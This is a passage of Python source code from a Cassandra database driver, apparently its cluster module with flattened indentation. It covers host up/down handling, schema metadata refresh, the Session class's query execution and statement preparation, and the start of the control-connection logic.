log.debug("Attempting to open new connection pools for host %s", host)
futures_lock = Lock()
futures_results = []
callback = partial(self._on_up_future_completed, host, futures, futures_results, futures_lock)
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
have_future = True
future.add_done_callback(callback)
futures.add(future)
except Exception:
log.exception("Unexpected failure handling node %s being marked up:", host)
for future in futures:
future.cancel()
self._cleanup_failed_on_up_handling(host)
with host.lock:
host._currently_handling_node_up = False
raise
else:
if not have_future:
with host.lock:
host._currently_handling_node_up = False
# for testing purposes
return futures
def _start_reconnector(self, host, is_host_addition):
if self.load_balancing_policy.distance(host) == HostDistance.IGNORED:
return
schedule = self.reconnection_policy.new_schedule()
# in order to not hold references to this Cluster open and prevent
# proper shutdown when the program ends, we'll just make a closure
# of the current Cluster attributes to create new Connections with
conn_factory = self._make_connection_factory(host)
reconnector = _HostReconnectionHandler(
host, conn_factory, is_host_addition, self.on_add, self.on_up,
self.scheduler, schedule, host.get_and_set_reconnection_handler,
new_handler=None)
old_reconnector = host.get_and_set_reconnection_handler(reconnector)
if old_reconnector:
log.debug("Old host reconnector found for %s, cancelling", host)
old_reconnector.cancel()
log.debug("Starting reconnector for host %s", host)
reconnector.start()
@run_in_executor
def on_down(self, host, is_host_addition, expect_host_to_be_down=False):
"""
Intended for internal use only.
"""
if self.is_shutdown:
return
with host.lock:
if (not host.is_up and not expect_host_to_be_down) or host.is_currently_reconnecting():
return
host.set_down()
log.warning("Host %s has been marked down", host)
self.load_balancing_policy.on_down(host)
self.control_connection.on_down(host)
for session in self.sessions:
session.on_down(host)
for listener in self.listeners:
listener.on_down(host)
self._start_reconnector(host, is_host_addition)
def on_add(self, host, refresh_nodes=True):
if self.is_shutdown:
return
log.debug("Handling new host %r and notifying listeners", host)
distance = self.load_balancing_policy.distance(host)
if distance != HostDistance.IGNORED:
self._prepare_all_queries(host)
log.debug("Done preparing queries for new host %r", host)
self.load_balancing_policy.on_add(host)
self.control_connection.on_add(host, refresh_nodes)
if distance == HostDistance.IGNORED:
log.debug("Not adding connection pool for new host %r because the "
"load balancing policy has marked it as IGNORED", host)
self._finalize_add(host, set_up=False)
return
futures_lock = Lock()
futures_results = []
futures = set()
def future_completed(future):
with futures_lock:
futures.discard(future)
try:
futures_results.append(future.result())
except Exception as exc:
futures_results.append(exc)
if futures:
return
log.debug('All futures have completed for added host %s', host)
for exc in [f for f in futures_results if isinstance(f, Exception)]:
log.error("Unexpected failure while adding node %s, will not mark up:", host, exc_info=exc)
return
if not all(futures_results):
log.warning("Connection pool could not be created, not marking node %s up", host)
return
self._finalize_add(host)
have_future = False
for session in self.sessions:
future = session.add_or_renew_pool(host, is_host_addition=True)
if future is not None:
have_future = True
futures.add(future)
future.add_done_callback(future_completed)
if not have_future:
self._finalize_add(host)
def _finalize_add(self, host, set_up=True):
if set_up:
host.set_up()
for listener in self.listeners:
listener.on_add(host)
# see if there are any pools to add or remove now that the host is marked up
for session in self.sessions:
session.update_created_pools()
def on_remove(self, host):
if self.is_shutdown:
return
log.debug("Removing host %s", host)
host.set_down()
self.load_balancing_policy.on_remove(host)
for session in self.sessions:
session.on_remove(host)
for listener in self.listeners:
listener.on_remove(host)
self.control_connection.on_remove(host)
def signal_connection_failure(self, host, connection_exc, is_host_addition, expect_host_to_be_down=False):
is_down = host.signal_connection_failure(connection_exc)
if is_down:
self.on_down(host, is_host_addition, expect_host_to_be_down)
return is_down
def add_host(self, address, datacenter=None, rack=None, signal=True, refresh_nodes=True):
"""
Called when adding initial contact points and when the control
connection subsequently discovers a new node.
Returns a Host instance, and a flag indicating whether it was new in
the metadata.
Intended for internal use only.
"""
host, new = self.metadata.add_or_return_host(Host(address, self.conviction_policy_factory, datacenter, rack))
if new and signal:
log.info("New Cassandra host %r discovered", host)
self.on_add(host, refresh_nodes)
return host, new
def remove_host(self, host):
"""
Called when the control connection observes that a node has left the
ring. Intended for internal use only.
"""
if host and self.metadata.remove_host(host):
log.info("Cassandra host %s removed", host)
self.on_remove(host)
def register_listener(self, listener):
"""
Adds a :class:`cassandra.policies.HostStateListener` subclass instance to
the list of listeners to be notified when a host is added, removed,
marked up, or marked down.
"""
with self._listener_lock:
self._listeners.add(listener)
def unregister_listener(self, listener):
""" Removes a registered listener. """
with self._listener_lock:
self._listeners.remove(listener)
@property
def listeners(self):
with self._listener_lock:
return self._listeners.copy()
def _ensure_core_connections(self):
"""
If any host has fewer than the configured number of core connections
open, attempt to open connections until that number is met.
"""
for session in self.sessions:
for pool in session._pools.values():
pool.ensure_core_connections()
@staticmethod
def _validate_refresh_schema(keyspace, table, usertype, function, aggregate):
if any((table, usertype, function, aggregate)):
if not keyspace:
raise ValueError("keyspace is required to refresh specific sub-entity {table, usertype, function, aggregate}")
if sum(1 for e in (table, usertype, function, aggregate) if e) > 1:
raise ValueError("{table, usertype, function, aggregate} are mutually exclusive")
@staticmethod
def _target_type_from_refresh_args(keyspace, table, usertype, function, aggregate):
if aggregate:
return SchemaTargetType.AGGREGATE
elif function:
return SchemaTargetType.FUNCTION
elif usertype:
return SchemaTargetType.TYPE
elif table:
return SchemaTargetType.TABLE
elif keyspace:
return SchemaTargetType.KEYSPACE
return None
def refresh_schema_metadata(self, max_schema_agreement_wait=None):
"""
Synchronously refresh all schema metadata.
By default, the timeout for this operation is governed by :attr:`~.Cluster.max_schema_agreement_wait`
and :attr:`~.Cluster.control_connection_timeout`.
Passing max_schema_agreement_wait here overrides :attr:`~.Cluster.max_schema_agreement_wait`.
Setting max_schema_agreement_wait <= 0 will bypass schema agreement and refresh schema immediately.
An Exception is raised if schema refresh fails for any reason.
"""
if not self.control_connection.refresh_schema(schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Schema metadata was not refreshed. See log for details.")
def refresh_keyspace_metadata(self, keyspace, max_schema_agreement_wait=None):
"""
Synchronously refresh keyspace metadata. This applies to keyspace-level information such as replication
and durability settings. It does not refresh tables, types, etc. contained in the keyspace.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.KEYSPACE, keyspace=keyspace,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Keyspace metadata was not refreshed. See log for details.")
def refresh_table_metadata(self, keyspace, table, max_schema_agreement_wait=None):
"""
Synchronously refresh table metadata. This applies to a table, and any triggers or indexes attached
to the table.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=table,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("Table metadata was not refreshed. See log for details.")
def refresh_materialized_view_metadata(self, keyspace, view, max_schema_agreement_wait=None):
"""
Synchronously refresh materialized view metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TABLE, keyspace=keyspace, table=view,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("View metadata was not refreshed. See log for details.")
def refresh_user_type_metadata(self, keyspace, user_type, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined type metadata.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.TYPE, keyspace=keyspace, type=user_type,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Type metadata was not refreshed. See log for details.")
def refresh_user_function_metadata(self, keyspace, function, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined function metadata.
``function`` is a :class:`cassandra.UserFunctionDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.FUNCTION, keyspace=keyspace, function=function,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Function metadata was not refreshed. See log for details.")
def refresh_user_aggregate_metadata(self, keyspace, aggregate, max_schema_agreement_wait=None):
"""
Synchronously refresh user defined aggregate metadata.
``aggregate`` is a :class:`cassandra.UserAggregateDescriptor`.
See :meth:`~.Cluster.refresh_schema_metadata` for description of ``max_schema_agreement_wait`` behavior
"""
if not self.control_connection.refresh_schema(target_type=SchemaTargetType.AGGREGATE, keyspace=keyspace, aggregate=aggregate,
schema_agreement_wait=max_schema_agreement_wait, force=True):
raise DriverException("User Aggregate metadata was not refreshed. See log for details.")
def refresh_nodes(self):
"""
Synchronously refresh the node list and token metadata
An Exception is raised if node refresh fails for any reason.
"""
if not self.control_connection.refresh_node_list_and_token_map():
raise DriverException("Node list was not refreshed. See log for details.")
def set_meta_refresh_enabled(self, enabled):
"""
*Deprecated:* set :attr:`~.Cluster.schema_metadata_enabled` and :attr:`~.Cluster.token_metadata_enabled` instead.
Sets a flag to enable (True) or disable (False) all metadata refresh queries.
This applies to both schema and node topology.
Disabling this is useful to minimize refreshes during multiple changes.
Meta refresh must be enabled for the driver to become aware of any cluster
topology changes or schema updates.
"""
self.schema_metadata_enabled = enabled
self.token_metadata_enabled = enabled
def _prepare_all_queries(self, host):
if not self._prepared_statements or not self.reprepare_on_up:
return
log.debug("Preparing all known prepared statements against host %s", host)
connection = None
try:
connection = self.connection_factory(host.address)
statements = self._prepared_statements.values()
for keyspace, ks_statements in groupby(statements, lambda s: s.keyspace):
if keyspace is not None:
connection.set_keyspace_blocking(keyspace)
# prepare 10 statements at a time
ks_statements = list(ks_statements)
chunks = []
for i in range(0, len(ks_statements), 10):
chunks.append(ks_statements[i:i + 10])
for ks_chunk in chunks:
messages = [PrepareMessage(query=s.query_string) for s in ks_chunk]
# TODO: make this timeout configurable somehow?
responses = connection.wait_for_responses(*messages, timeout=5.0, fail_on_error=False)
for success, response in responses:
if not success:
log.debug("Got unexpected response when preparing "
"statement on host %s: %r", host, response)
log.debug("Done preparing all known prepared statements against host %s", host)
except OperationTimedOut as timeout:
log.warning("Timed out trying to prepare all statements on host %s: %s", host, timeout)
except (ConnectionException, socket.error) as exc:
log.warning("Error trying to prepare all statements on host %s: %r", host, exc)
except Exception:
log.exception("Error trying to prepare all statements on host %s", host)
finally:
if connection:
connection.close()
def add_prepared(self, query_id, prepared_statement):
with self._prepared_statement_lock:
self._prepared_statements[query_id] = prepared_statement
class Session(object):
"""
A collection of connection pools for each host in the cluster.
Instances of this class should not be created directly, only
using :meth:`.Cluster.connect()`.
Queries and statements can be executed through ``Session`` instances
using the :meth:`~.Session.execute()` and :meth:`~.Session.execute_async()`
methods.
Example usage::
>>> session = cluster.connect()
>>> session.set_keyspace("mykeyspace")
>>> session.execute("SELECT * FROM mycf")
"""
cluster = None
hosts = None
keyspace = None
is_shutdown = False
row_factory = staticmethod(named_tuple_factory)
"""
The format to return row results in. By default, each
returned row will be a named tuple. You can alternatively
use any of the following:
- :func:`cassandra.query.tuple_factory` - return a result row as a tuple
- :func:`cassandra.query.named_tuple_factory` - return a result row as a named tuple
- :func:`cassandra.query.dict_factory` - return a result row as a dict
- :func:`cassandra.query.ordered_dict_factory` - return a result row as an OrderedDict
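For example, a minimal sketch switching a session to dict rows::
    from cassandra.query import dict_factory
    session.row_factory = dict_factory
    rows = session.execute("SELECT * FROM mycf")  # each row is now a dict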
"""
default_timeout = 10.0
"""
A default timeout, measured in seconds, for queries executed through
:meth:`.execute()` or :meth:`.execute_async()`. This default may be
overridden with the `timeout` parameter for either of those methods.
Setting this to :const:`None` will cause no timeouts to be set by default.
Please see :meth:`.ResponseFuture.result` for details on the scope and
effect of this timeout.
.. versionadded:: 2.0.0
"""
default_consistency_level = ConsistencyLevel.LOCAL_ONE
"""
The default :class:`~ConsistencyLevel` for operations executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.consistency_level` on individual statements.
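For example, a sketch raising the session-wide default::
    from cassandra import ConsistencyLevel
    session.default_consistency_level = ConsistencyLevel.QUORUM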
.. versionadded:: 1.2.0
.. versionchanged:: 3.0.0
default changed from ONE to LOCAL_ONE
"""
default_serial_consistency_level = None
"""
The default :class:`~ConsistencyLevel` for serial phase of conditional updates executed through
this session. This default may be overridden by setting the
:attr:`~.Statement.serial_consistency_level` on individual statements.
Only valid for ``protocol_version >= 2``.
"""
max_trace_wait = 2.0
"""
The maximum amount of time (in seconds) the driver will wait for trace
details to be populated server-side for a query before giving up.
If the `trace` parameter for :meth:`~.execute()` or :meth:`~.execute_async()`
is :const:`True`, the driver will repeatedly attempt to fetch trace
details for the query (using exponential backoff) until this limit is
hit. If the limit is passed, an error will be logged and the
:attr:`.Statement.trace` will be left as :const:`None`. """
default_fetch_size = 5000
"""
By default, this many rows will be fetched at a time. Setting
this to :const:`None` will disable automatic paging for large query
results. The fetch size can be also specified per-query through
:attr:`.Statement.fetch_size`.
This only takes effect when protocol version 2 or higher is used.
See :attr:`.Cluster.protocol_version` for details.
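For example, a sketch (hypothetical table) overriding the page size for one query::
    from cassandra.query import SimpleStatement
    statement = SimpleStatement("SELECT * FROM mycf", fetch_size=100)
    for row in session.execute(statement):
        pass  # rows are fetched transparently in pages of 100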
.. versionadded:: 2.0.0
"""
use_client_timestamp = True
"""
When using protocol version 3 or higher, write timestamps may be supplied
client-side at the protocol level. (Normally they are generated
server-side by the coordinator node.) Note that timestamps specified
within a CQL query will override this timestamp.
.. versionadded:: 2.1.0
"""
encoder = None
"""
A :class:`~cassandra.encoder.Encoder` instance that will be used when
formatting query parameters for non-prepared statements. This is not used
for prepared statements (because prepared statements give the driver more
information about what CQL types are expected, allowing it to accept a
wider range of python types).
The encoder uses a mapping from python types to encoder methods (for
specific CQL types). This mapping can be modified by users as they see
fit. Methods of :class:`~cassandra.encoder.Encoder` should be used for mapping
values if possible, because they take precautions to avoid injections and
properly sanitize data.
Example::
cluster = Cluster()
session = cluster.connect("mykeyspace")
session.encoder.mapping[tuple] = session.encoder.cql_encode_tuple
session.execute("CREATE TABLE mytable (k int PRIMARY KEY, col tuple<int, ascii>)")
session.execute("INSERT INTO mytable (k, col) VALUES (%s, %s)", [0, (123, 'abc')])
.. versionadded:: 2.1.0
"""
client_protocol_handler = ProtocolHandler
"""
Specifies a protocol handler that will be used for client-initiated requests (i.e. no
internal driver requests). This can be used to override or extend features such as
message or type ser/des.
The default pure python implementation is :class:`cassandra.protocol.ProtocolHandler`.
When compiled with Cython, there are also built-in faster alternatives. See :ref:`faster_deser`
"""
_lock = None
_pools = None
_load_balancer = None
_metrics = None
def __init__(self, cluster, hosts):
self.cluster = cluster
self.hosts = hosts
self._lock = RLock()
self._pools = {}
self._load_balancer = cluster.load_balancing_policy
self._metrics = cluster.metrics
self._protocol_version = self.cluster.protocol_version
self.encoder = Encoder()
# create connection pools in parallel
futures = []
for host in hosts:
future = self.add_or_renew_pool(host, is_host_addition=False)
if future is not None:
futures.append(future)
for future in futures:
future.result()
def execute(self, query, parameters=None, timeout=_NOT_SET, trace=False, custom_payload=None):
"""
Execute the given query and synchronously wait for the response.
If an error is encountered while executing the query, an Exception
will be raised.
`query` may be a query string or an instance of :class:`cassandra.query.Statement`.
`parameters` may be a sequence or dict of parameters to bind. If a
sequence is used, ``%s`` should be used as the placeholder for each
argument. If a dict is used, ``%(name)s`` style placeholders must
be used.
`timeout` should specify a floating-point timeout (in seconds) after
which an :exc:`.OperationTimedOut` exception will be raised if the query
has not completed. If not set, the timeout defaults to
:attr:`~.Session.default_timeout`. If set to :const:`None`, there is
no timeout. Please see :meth:`.ResponseFuture.result` for details on
the scope and effect of this timeout.
If `trace` is set to :const:`True`, the query will be sent with tracing enabled.
The trace details can be obtained using the returned :class:`.ResultSet` object.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload, the message payload
will be a union of the two, with the values specified here taking precedence.
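Example (hypothetical table and bind parameter ``user_id``)::
    rows = session.execute("SELECT name, age FROM users WHERE id=%s", (user_id,))
    for row in rows:
        log.info("%s is %s", row.name, row.age)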
"""
return self.execute_async(query, parameters, trace, custom_payload, timeout).result()
def execute_async(self, query, parameters=None, trace=False, custom_payload=None, timeout=_NOT_SET):
"""
Execute the given query and return a :class:`~.ResponseFuture` object
which callbacks may be attached to for asynchronous response
delivery. You may also call :meth:`~.ResponseFuture.result()`
on the :class:`.ResponseFuture` to synchronously block for results at
any time.
If `trace` is set to :const:`True`, you may get the query trace descriptors using
:meth:`.ResponseFuture.get_query_trace()` or :meth:`.ResponseFuture.get_all_query_traces()`
on the future result.
`custom_payload` is a :ref:`custom_payload` dict to be passed to the server.
If `query` is a Statement with its own custom_payload, the message payload
will be a union of the two, with the values specified here taking precedence.
If the server sends a custom payload in the response message,
the dict can be obtained following :meth:`.ResponseFuture.result` via
:attr:`.ResponseFuture.custom_payload`
Example usage::
>>> session = cluster.connect()
>>> future = session.execute_async("SELECT * FROM mycf")
>>> def log_results(results):
... for row in results:
... log.info("Results: %s", row)
>>> def log_error(exc):
>>> log.error("Operation failed: %s", exc)
>>> future.add_callbacks(log_results, log_error)
Async execution with blocking wait for results::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... results = future.result()
... except Exception:
... log.exception("Operation failed:")
"""
if timeout is _NOT_SET:
timeout = self.default_timeout
future = self._create_response_future(query, parameters, trace, custom_payload, timeout)
future._protocol_handler = self.client_protocol_handler
future.send_request()
return future
def _create_response_future(self, query, parameters, trace, custom_payload, timeout):
""" Returns the ResponseFuture before calling send_request() on it """
prepared_statement = None
if isinstance(query, six.string_types):
query = SimpleStatement(query)
elif isinstance(query, PreparedStatement):
query = query.bind(parameters)
cl = query.consistency_level if query.consistency_level is not None else self.default_consistency_level
serial_cl = query.serial_consistency_level if query.serial_consistency_level is not None else self.default_serial_consistency_level
fetch_size = query.fetch_size
if fetch_size is FETCH_SIZE_UNSET and self._protocol_version >= 2:
fetch_size = self.default_fetch_size
elif self._protocol_version == 1:
fetch_size = None
if self._protocol_version >= 3 and self.use_client_timestamp:
timestamp = int(time.time() * 1e6)
else:
timestamp = None
if isinstance(query, SimpleStatement):
query_string = query.query_string
if parameters:
query_string = bind_params(query_string, parameters, self.encoder)
message = QueryMessage(
query_string, cl, serial_cl,
fetch_size, timestamp=timestamp)
elif isinstance(query, BoundStatement):
message = ExecuteMessage(
query.prepared_statement.query_id, query.values, cl,
serial_cl, fetch_size,
timestamp=timestamp)
prepared_statement = query.prepared_statement
elif isinstance(query, BatchStatement):
if self._protocol_version < 2:
raise UnsupportedOperation(
"BatchStatement execution is only supported with protocol version "
"2 or higher (supported in Cassandra 2.0 and higher). Consider "
"setting Cluster.protocol_version to 2 to support this operation.")
message = BatchMessage(
query.batch_type, query._statements_and_parameters, cl,
serial_cl, timestamp)
message.tracing = trace
message.update_custom_payload(query.custom_payload)
message.update_custom_payload(custom_payload)
return ResponseFuture(
self, message, query, timeout, metrics=self._metrics,
prepared_statement=prepared_statement)
def prepare(self, query, custom_payload=None):
"""
Prepares a query string, returning a :class:`~cassandra.query.PreparedStatement`
instance which can be used as follows::
>>> session = cluster.connect("mykeyspace")
>>> query = "INSERT INTO users (id, name, age) VALUES (?, ?, ?)"
>>> prepared = session.prepare(query)
>>> session.execute(prepared, (user.id, user.name, user.age))
Or you may bind values to the prepared statement ahead of time::
>>> prepared = session.prepare(query)
>>> bound_stmt = prepared.bind((user.id, user.name, user.age))
>>> session.execute(bound_stmt)
Of course, prepared statements may (and should) be reused::
>>> prepared = session.prepare(query)
>>> for user in users:
... bound = prepared.bind((user.id, user.name, user.age))
... session.execute(bound)
**Important**: PreparedStatements should be prepared only once.
Preparing the same query more than once will likely affect performance.
`custom_payload` is a key value map to be passed along with the prepare
message. See :ref:`custom_payload`.
"""
message = PrepareMessage(query=query)
future = ResponseFuture(self, message, query=None, timeout=self.default_timeout)
try:
future.send_request()
query_id, column_metadata, pk_indexes = future.result()
except Exception:
log.exception("Error preparing query:")
raise
prepared_statement = PreparedStatement.from_message(
query_id, column_metadata, pk_indexes, self.cluster.metadata, query, self.keyspace,
self._protocol_version)
prepared_statement.custom_payload = future.custom_payload
self.cluster.add_prepared(query_id, prepared_statement)
if self.cluster.prepare_on_all_hosts:
host = future._current_host
try:
self.prepare_on_all_hosts(prepared_statement.query_string, host)
except Exception:
log.exception("Error preparing query on all hosts:")
return prepared_statement
def prepare_on_all_hosts(self, query, excluded_host):
"""
Prepare the given query on all hosts, excluding ``excluded_host``.
Intended for internal use only.
"""
futures = []
for host in self._pools.keys():
if host != excluded_host and host.is_up:
future = ResponseFuture(self, PrepareMessage(query=query), None, self.default_timeout)
# we don't care about errors preparing against specific hosts,
# since we can always prepare them as needed when the prepared
# statement is used. Just log errors and continue on.
try:
request_id = future._query(host)
except Exception:
log.exception("Error preparing query for host %s:", host)
continue
if request_id is None:
# the error has already been logged by ResponseFuture
log.debug("Failed to prepare query for host %s: %r",
host, future._errors.get(host))
continue
futures.append((host, future))
for host, future in futures:
try:
future.result()
except Exception:
log.exception("Error preparing query for host %s:", host)
def shutdown(self):
"""
Close all connections. ``Session`` instances should not be used
for any purpose after being shutdown.
"""
with self._lock:
if self.is_shutdown:
return
else:
self.is_shutdown = True
for pool in self._pools.values():
pool.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
def add_or_renew_pool(self, host, is_host_addition):
"""
For internal use only.
"""
distance = self._load_balancer.distance(host)
if distance == HostDistance.IGNORED:
return None
def run_add_or_renew_pool():
try:
if self._protocol_version >= 3:
new_pool = HostConnection(host, distance, self)
else:
new_pool = HostConnectionPool(host, distance, self)
except AuthenticationFailed as auth_exc:
conn_exc = ConnectionException(str(auth_exc), host=host)
self.cluster.signal_connection_failure(host, conn_exc, is_host_addition)
return False
except Exception as conn_exc:
log.warning("Failed to create connection pool for new host %s:",
host, exc_info=conn_exc)
# the host itself will still be marked down, so we need to pass
# a special flag to make sure the reconnector is created
self.cluster.signal_connection_failure(
host, conn_exc, is_host_addition, expect_host_to_be_down=True)
return False
previous = self._pools.get(host)
self._pools[host] = new_pool
log.debug("Added pool for host %s to session", host)
if previous:
previous.shutdown()
return True
return self.submit(run_add_or_renew_pool)
def remove_pool(self, host):
pool = self._pools.pop(host, None)
if pool:
log.debug("Removed connection pool for %r", host)
return self.submit(pool.shutdown)
else:
return None
def update_created_pools(self):
"""
When the set of live nodes changes, the load balancer may change its
mind on host distances. It might change them for the node that came or left,
but also for other nodes (for instance, if a node dies, a
previously ignored node may now be considered).
This method ensures that all hosts for which a pool should exist
have one, and hosts that shouldn't don't.
For internal use only.
"""
for host in self.cluster.metadata.all_hosts():
distance = self._load_balancer.distance(host)
pool = self._pools.get(host)
if not pool or pool.is_shutdown:
# we don't eagerly set is_up on previously ignored hosts. None is included here
# to allow us to attempt connections to hosts that have gone from ignored to something
# else.
if distance != HostDistance.IGNORED and host.is_up in (True, None):
self.add_or_renew_pool(host, False)
elif distance != pool.host_distance:
# the distance has changed
if distance == HostDistance.IGNORED:
self.remove_pool(host)
else:
pool.host_distance = distance
def on_down(self, host):
"""
Called by the parent Cluster instance when a node is marked down.
Only intended for internal use.
"""
future = self.remove_pool(host)
if future:
future.add_done_callback(lambda f: self.update_created_pools())
def on_remove(self, host):
""" Internal """
self.on_down(host)
def set_keyspace(self, keyspace):
"""
Set the default keyspace for all queries made through this Session.
This operation blocks until complete.
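        A minimal sketch (assumes a connected ``session``; the keyspace and table
        names are hypothetical)::
            >>> session.set_keyspace("mykeyspace")
            >>> rows = session.execute("SELECT * FROM users")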
"""
self.execute('USE %s' % (protect_name(keyspace),))
def _set_keyspace_for_all_pools(self, keyspace, callback):
"""
Asynchronously sets the keyspace on all pools. When all
pools have set all of their connections, `callback` will be
called with a dictionary of all errors that occurred, keyed
by the `Host` that they occurred against.
"""
self.keyspace = keyspace
remaining_callbacks = set(self._pools.values())
errors = {}
if not remaining_callbacks:
callback(errors)
return
def pool_finished_setting_keyspace(pool, host_errors):
remaining_callbacks.remove(pool)
if host_errors:
errors[pool.host] = host_errors
if not remaining_callbacks:
callback(host_errors)
for pool in self._pools.values():
pool._set_keyspace_for_all_conns(keyspace, pool_finished_setting_keyspace)
def user_type_registered(self, keyspace, user_type, klass):
"""
Called by the parent Cluster instance when the user registers a new
mapping from a user-defined type to a class. Intended for internal
use only.
"""
try:
ks_meta = self.cluster.metadata.keyspaces[keyspace]
except KeyError:
raise UserTypeDoesNotExist(
'Keyspace %s does not exist or has not been discovered by the driver' % (keyspace,))
try:
type_meta = ks_meta.user_types[user_type]
except KeyError:
raise UserTypeDoesNotExist(
'User type %s does not exist in keyspace %s' % (user_type, keyspace))
field_names = type_meta.field_names
if six.PY2:
# go from unicode to string to avoid decode errors from implicit
# decode when formatting non-ascii values
field_names = [fn.encode('utf-8') for fn in field_names]
def encode(val):
return '{ %s }' % ' , '.join('%s : %s' % (
field_name,
self.encoder.cql_encode_all_types(getattr(val, field_name, None))
) for field_name in field_names)
self.encoder.mapping[klass] = encode
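        # Illustrative sketch of the string the generated encoder produces for a
        # hypothetical UDT value (the Address type, field names, and values are
        # made up; exact quoting depends on Encoder.cql_encode_all_types):
        #     encode(Address(street='123 Main St', city='Springfield'))
        #     -> "{ street : '123 Main St' , city : 'Springfield' }"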
def submit(self, fn, *args, **kwargs):
""" Internal """
if not self.is_shutdown:
return self.cluster.executor.submit(fn, *args, **kwargs)
def get_pool_state(self):
return dict((host, pool.get_state()) for host, pool in self._pools.items())
def get_pools(self):
return self._pools.values()
class UserTypeDoesNotExist(Exception):
"""
An attempt was made to use a user-defined type that does not exist.
.. versionadded:: 2.1.0
"""
pass
class _ControlReconnectionHandler(_ReconnectionHandler):
"""
Internal
"""
def __init__(self, control_connection, *args, **kwargs):
_ReconnectionHandler.__init__(self, *args, **kwargs)
self.control_connection = weakref.proxy(control_connection)
def try_reconnect(self):
return self.control_connection._reconnect_internal()
def on_reconnection(self, connection):
self.control_connection._set_new_connection(connection)
def on_exception(self, exc, next_delay):
# TODO only overridden to add logging, so add logging
if isinstance(exc, AuthenticationFailed):
return False
else:
log.debug("Error trying to reconnect control connection: %r", exc)
return True
def _watch_callback(obj_weakref, method_name, *args, **kwargs):
"""
A callback handler for the ControlConnection that tolerates
weak references.
"""
obj = obj_weakref()
if obj is None:
return
getattr(obj, method_name)(*args, **kwargs)
def _clear_watcher(conn, expiring_weakref):
"""
Called when the ControlConnection object is about to be finalized.
This clears watchers on the underlying Connection object.
"""
try:
conn.control_conn_disposed()
except ReferenceError:
pass
class ControlConnection(object):
"""
Internal
"""
_SELECT_PEERS = "SELECT * FROM system.peers"
_SELECT_PEERS_NO_TOKENS = "SELECT peer, data_center, rack, rpc_address, release_version, schema_version FROM system.peers"
_SELECT_LOCAL = "SELECT * FROM system.local WHERE key='local'"
_SELECT_LOCAL_NO_TOKENS = "SELECT cluster_name, data_center, rack, partitioner, release_version, schema_version FROM system.local WHERE key='local'"
_SELECT_SCHEMA_PEERS = "SELECT peer, rpc_address, schema_version FROM system.peers"
_SELECT_SCHEMA_LOCAL = "SELECT schema_version FROM system.local WHERE key='local'"
_is_shutdown = False
_timeout = None
_protocol_version = None
_schema_event_refresh_window = None
_topology_event_refresh_window = None
_status_event_refresh_window = None
_schema_meta_enabled = True
_token_meta_enabled = True
# for testing purposes
_time = time
def __init__(self, cluster, timeout,
schema_event_refresh_window,
topology_event_refresh_window,
status_event_refresh_window,
schema_meta_enabled=True,
token_meta_enabled=True):
# use a weak reference to allow the Cluster instance to be GC'ed (and
# shutdown) since implementing __del__ disables the cycle detector
self._cluster = weakref.proxy(cluster)
self._connection = None
self._timeout = timeout
self._schema_event_refresh_window = schema_event_refresh_window
self._topology_event_refresh_window = topology_event_refresh_window
self._status_event_refresh_window = status_event_refresh_window
self._schema_meta_enabled = schema_meta_enabled
self._token_meta_enabled = token_meta_enabled
self._lock = RLock()
self._schema_agreement_lock = Lock()
self._reconnection_handler = None
self._reconnection_lock = RLock()
self._event_schedule_times = {}
def connect(self):
if self._is_shutdown:
return
self._protocol_version = self._cluster.protocol_version
self._set_new_connection(self._reconnect_internal())
def _set_new_connection(self, conn):
"""
Replace existing connection (if there is one) and close it.
"""
with self._lock:
old = self._connection
self._connection = conn
if old:
log.debug("[control connection] Closing old connection %r, replacing with %r", old, conn)
old.close()
def _reconnect_internal(self):
"""
Tries to connect to each host in the query plan until one succeeds
or every attempt fails. If successful, a new Connection will be
returned. Otherwise, :exc:`NoHostAvailable` will be raised
with an "errors" arg that is a dict mapping host addresses
to the exception that was raised when an attempt was made to open
a connection to that host.
"""
errors = {}
for host in self._cluster.load_balancing_policy.make_query_plan():
try:
return self._try_connect(host)
except ConnectionException as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
self._cluster.signal_connection_failure(host, exc, is_host_addition=False)
except Exception as exc:
errors[host.address] = exc
log.warning("[control connection] Error connecting to %s:", host, exc_info=True)
if self._is_shutdown:
raise DriverException("[control connection] Reconnection in progress during shutdown")
raise NoHostAvailable("Unable to connect to any servers", errors)
def _try_connect(self, host):
"""
Creates a new Connection, registers for pushed events, and refreshes
node/token and schema metadata.
"""
log.debug("[control connection] Opening new connection to %s", host)
while True:
try:
connection = self._cluster.connection_factory(host.address, is_control_connection=True)
if self._is_shutdown:
connection.close()
raise DriverException("Reconnecting during shutdown")
break
except ProtocolVersionUnsupported as e:
self._cluster.protocol_downgrade(host.address, e.startup_version)
log.debug("[control connection] Established new connection %r, "
"registering watchers and refreshing schema and topology",
connection)
# use weak references in both directions
# _clear_watcher will be called when this ControlConnection is about to be finalized
# _watch_callback will get the actual callback from the Connection and relay it to
# this object (after a dereferencing a weakref)
